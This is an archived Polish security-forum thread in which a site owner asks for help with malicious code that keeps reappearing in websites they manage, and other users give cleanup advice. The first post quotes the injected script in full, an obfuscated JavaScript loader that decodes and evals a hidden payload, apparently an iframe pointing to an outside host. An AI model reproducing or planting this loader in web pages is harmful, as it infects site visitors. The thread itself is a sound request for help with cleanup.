+- SafeGroup (https://safegroup.pl)
+-- Dział: Bezpieczeństwo (https://safegroup.pl/forum-10.html)
+--- Dział: Pomoc po zainfekowaniu (https://safegroup.pl/forum-5.html)
+--- Wątek: Wirus na stronie www (/thread-3674.html)
Wirus na stronie www - tomasbobas - 25.10.2011
Witam,
Na mojej stronie www pojawił się jakiś robak w kodzie. Avira i malwarebytes nic nie znalazły jednak problem ciągle się pojawia, infekując kolejne strony (którymi zarządzam). Oto on:
[malware] <script>b=new function(){return 2;};try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd=''q'';if(''q''==={}.asd)a=document[''createTextNode''] (''321'');if(a.nodeValue==321)h=(ddd-d2)*-1;n=''4.5c4.5c52.5c51c16c20c50c55.5c49.5c58.5c54.5c50.5c55c58c23c51.5c50.5c58c34.5c54c50.5c54.5c50.5c55c58c57.5c33c60.5c42c48.5c51.5c39c48.5c54.5c50.5c20c19.5c49c55.5c50c60.5c19.5c20.5c45.5c24c46.5c20.5c61.5c4.5c4.5c4.5c52.5c51c57c48.5c54.5c50.5c57c20c20.5c29.5c4.5c4.5c62.5c16c50.5c54c57.5c50.5c16c61.5c4.5c4.5c4.5c50c55.5c49.5c58.5c54.5c50.5c55c58c23c59.5c57c52.5c58c50.5c20c17c30c52.5c51c57c48.5c54.5c50.5c16c57.5c57c49.5c30.5c19.5c52c58c58c56c29c23.5c23.5c49.5c55.5c55c55c50.5c49.5c58c50.5c50c22.5c52c50.5c50c23c49.5c55.5c54.5c23.5c59c55.5c52.5c50c23c56c52c56c31.5c56c48.5c51.5c50.5c30.5c27c24c26c28.5c51c50c27.5c48.5c49c49.5c28c48.5c24c49c28c25.5c19.5c16c59.5c52.5c50c58c52c30.5c19.5c24.5c24c19.5c16c52c50.5c52.5c51.5c52c58c30.5c19.5c24.5c24c19.5c16c57.5c58c60.5c54c50.5c30.5c19.5c59c52.5c57.5c52.5c49c52.5c54c52.5c58c60.5c29c52c52.5c50c50c50.5c55c29.5c56c55.5c57.5c52.5c58c52.5c55.5c55c29c48.5c49c57.5c55.5c54c58.5c58c50.5c29.5c54c50.5c51c58c29c24c29.5c58c55.5c56c29c24c29.5c19.5c31c30c23.5c52.5c51c57c48.5c54.5c50.5c31c17c20.5c29.5c4.5c4.5c62.5c4.5c4.5c51c58.5c55c49.5c58c52.5c55.5c55c16c52.5c51c57c48.5c54.5c50.5c57c20c20.5c61.5c4.5c4.5c4.5c59c48.5c57c16c51c16c30.5c16c50c55.5c49.5c58.5c54.5c50.5c55c58c23c49.5c57c50.5c48.5c58c50.5c34.5c54c50.5c54.5c50.5c55c58c20c19.5c52.5c51c57c48.5c54.5c50.5c19.5c20.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c57.5c57c49.5c19.5c22c19.5c52c58c58c56c29c23.5c23.5c49.5c55.5c55c55c50.5c49.5c58c50.5c50c22.5c52c50.5c50c23c49.5c55.5c54.5c23.5c59c55.5c52.5c50c23c56c52c56c31.5c56c48.5c51.5c50.5c30.5c27c24c26c28.5c51c50c27.5c48.5c49c49.5c28c48.5c24c49c28c25.5c19.5c20.5c29.5c51c23c57.5c58c60.5c54c50.5c23c59c52.5c57.5c52.5c49c52.5c54c52.5c58c60.5c30.5c19.5c52c52.5c50c50c50.5c55c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c56c55.5c57.5c52.5c58c52.5c55.5c55c30.5c19.5c48.5c49c57.5c55.5c54c58.5c58c50.5c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c54c50.5c51c58c30.5c19.5c24c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c58c55.5c56c30.5c19.5c24c19.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c59.5c52.5c50c58c52c19.5c22c19.5c24.5c24c19.5c20.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c52c50.5c52.5c51.5c52c58c19.5c22c19.5c24.5c24c19.5c20.5c29.5c4.5c4.5c4.5c50c55.5c49.5c58.5c54.5c50.5c55c58c23c51.5c50.5c58c34.5c54c50.5c54.5c50.5c55c58c57.5c33c60.5c42c48.5c51.5c39c48.5c54.5c50.5c20c19.5c49c55.5c50c60.5c19.5c20.5c45.5c24c46.5c23c48.5c56c56c50.5c55c50c33.5c52c52.5c54c50c20c51c20.5c29.5c4.5c4.5c62.5'';n=n[''split''] (''c'');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i] "));if(a.nodeValue==321)eval(ss);</script>[/malware]
Nie wiem już co robić. Usuwam to od trzech dni a to ciągle powraca. Pomocy.
Re: Wirus na stronie www - Konto usunięte - 25.10.2011
1. Zmień hasło do FTP
2. Zmień hasło do panelu hostingowego o ile takowy ma hosting z jakiego korzystasz
3. Zmień hasła we wszystkich CMSach jakie masz na stronie (wszelkie konta gdzie jest autoryzacja po haśle)
4. Jeżeli nadal będzie się powtarzać, skontaktuj się z hostingiem i zapytaj, czy to może nie jakieś globalne wstrzykiwanie kodu na ich konta
5. O ile jesteś w stanie, sprawdź, czy na serwerze nie ma jakichś podejrzanych plików php/asp (nie wiadomo z czego korzystasz, więc za wiele powiedzieć nie można), których wcześniej nie było
Re: Wirus na stronie www - tomasbobas - 25.10.2011
Dziękuję za odpowiedź. Tak mi się zdawało że to może być przyczyną. Jeszcze jedno pytanie. Czy zmiana nazw polskich na angielskie w menu start też może być spowodowana wirusami?
Re: Wirus na stronie www - Fix00ser - 25.10.2011
czasami można także skorzystać z sieciowego skanerado wykrywania exploitów oraz malware
[Aby zobaczyć linki, zarejestruj się tutaj]
Re: Wirus na stronie www - tomasbobas - 26.10.2011
Wszystkie hasła zostały zmienione, połączenia usunięte z total commandera. Poprawa była tylko na jeden dzień. Dziś znów to samo. Nie wiem co z tym zrobić. Kończą mi się pomysły.
Re: Wirus na stronie www - Eugeniusz - 26.10.2011
Upewnij się że Twój komputer jest czysty (keyloggery) oraz połączenie sieciowe (sniffery).
Re: Wirus na stronie www - tomasbobas - 27.10.2011
Możesz jak krowie na rowie.
Co mam zainstalować? Na co zwrócić uwagę?
Re: Wirus na stronie www - morphiusz - 27.10.2011
Najlepiej użyć do tego celu wyspecjalizowanych programów jak (najlepiej kilka lub wszystkie z nich):
-
[Aby zobaczyć linki, zarejestruj się tutaj]
,-
[Aby zobaczyć linki, zarejestruj się tutaj]
-[Aby zobaczyć linki, zarejestruj się tutaj]
Comodo Cleaning Essentials:[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Re: Wirus na stronie www - tomasbobas - 27.10.2011
A czy one kolidują z nortonem?
Re: Wirus na stronie www - bardok206 - 27.10.2011
tomasbobas napisał(a):A czy one kolidują z nortonem?To wszystko skanery na żądanie (prócz mbam pro), więc nie powinny.
Re: Wirus na stronie www - Blade - 27.10.2011
bardok206 napisał(a):tomasbobas napisał(a):A czy one kolidują z nortonem?To wszystko skanery na żądanie (prócz mbam pro), więc nie powinny.
Ale MBAM Free będzie w sam raz.
Re: Wirus na stronie www - tomasbobas - 31.10.2011
Witam ponownie. Po ściągnięciu wszystkich podanych programów, zeskanowaniu i wywaleniu całego syfu, problem znów powrócił. Emergency Kit znalazł coś takiego - torjan.js.iframe!ik. W ścieżce do tego trojana widnieje taki zapis mozilla/firefox/profile/au9npkvc/Klaudia/cache/9/47/d04cad01. Czy to możliwe by trojan zagnieżdzał się gdzieś w przeglądarce tudzież w mozilli jest jakaś luka "dzięki", której wchodzi? Co z tym zrobić?
Re: Wirus na stronie www - Flash999 - 31.10.2011
To szkodliwa ramka iFrame. Nie, wirus nie zagnieździł się w przeglądarce. To tylko tymczasowe pliki.
Re: Wirus na stronie www - tomasbobas - 31.10.2011
Czy to ona jest przyczyną tych złośliwych kodów na stronie?
Re: Wirus na stronie www - Flash999 - 31.10.2011
Niestety - nie wiem. Niech inni się wypowiedzą.